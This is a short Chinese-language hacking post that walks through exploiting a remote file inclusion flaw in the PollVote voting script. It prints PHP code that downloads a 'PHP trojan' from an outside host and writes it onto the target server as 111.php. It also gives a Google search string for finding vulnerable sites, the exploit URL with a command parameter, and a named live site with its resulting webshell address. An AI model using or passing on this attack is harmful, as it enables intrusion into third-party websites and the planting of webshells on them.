PollVote是一个投票系统，今天看了非安全的杂志，看了利用方法，  不过作者说利用过程的时候很烦琐，关键的时候又没说明白，  简单的说一下``  首先建立2个文本 分别是creatfile.txt和phpdoor.txt  creatfile.txt内容写  <?  $f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");  $ff=fopen("111.php","a");  fwrite ($ff,$f);  fclose($ff);  ?>  phpdoor.txt内容就写个PHP木马  之后在http://www.google.com 搜索关键词"pollvote.php?pollname"  有很多，  搜索到一个http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg  就是他了  EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls  这个就是利用原理了，  刚才说到的creatfile.txt和phpdoor.txt这个2个文件都上传到自己的空间里  执行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt  这样  phpdoor.txt里的内容就会生成一个111.php  这样我们就得到WEBSHELL了  http://www.skinnyturd.co.uk/poll/111.php